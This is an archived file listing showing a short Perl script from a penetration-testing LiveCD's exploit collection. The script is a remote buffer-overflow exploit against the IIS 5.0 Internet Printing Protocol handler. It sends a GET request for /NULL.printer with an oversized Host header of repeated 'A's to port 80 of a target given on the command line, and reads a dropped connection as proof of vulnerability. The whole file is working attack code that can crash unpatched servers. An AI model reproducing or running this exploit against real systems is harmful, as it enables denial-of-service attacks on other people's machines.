home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / iis / iiswebexplt.pl < prev    next >
Perl Script  |  2005-02-12  |  2KB  |  46 lines
  1. #!/usr/bin/perl
  2. # Exploit By storm@stormdev.net
  3. # Tested with sucess against Win2k IIS 5.0 + SP1
  4. # Remote Buffer Overflow Test for Internet Printing Protocol 
  5. # This code was written after eEye brought this issue in BugTraq.
  6.  
  7.  
  8. use Socket;
  9.  
  10.  
  11. print "-- IPP - IIS 5.0 Vulnerability Test By Storm --\n\n";
  12.  
  13. if (not $ARGV[0]) {
  14.     print qq~
  15.          Usage: webexplt.pl <host>
  16.     ~; 
  17. exit;}
  18.  
  19.  
  20. $ip=$ARGV[0];
  21.  
  22. print "Sending Exploit Code to host: " . $ip . "\n\n";
  23. my @results=sendexplt("GET /NULL.printer HTTP/1.0\n" . "Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n");
  24. print "Results:\n";
  25.  
  26. if (not @results) {
  27.     print "The Machine tested has the IPP Vulnerability!";
  28. }
  29. print @results;
  30.  
  31. sub sendexplt {
  32.         my ($pstr)=@_; 
  33.     $target= inet_aton($ip) || die("inet_aton problems");
  34.         socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
  35.                 die("Socket problems\n");
  36.         if(connect(S,pack "SnA4x8",2,80,$target)){
  37.                 select(S);              
  38.         $|=1;
  39.                 print $pstr;            
  40.         my @in=<S>;
  41.                select(STDOUT);
  42.             close(S);
  43.                 return @in;
  44.         } else { die("Can't connect...\n"); }
  45. }
  46.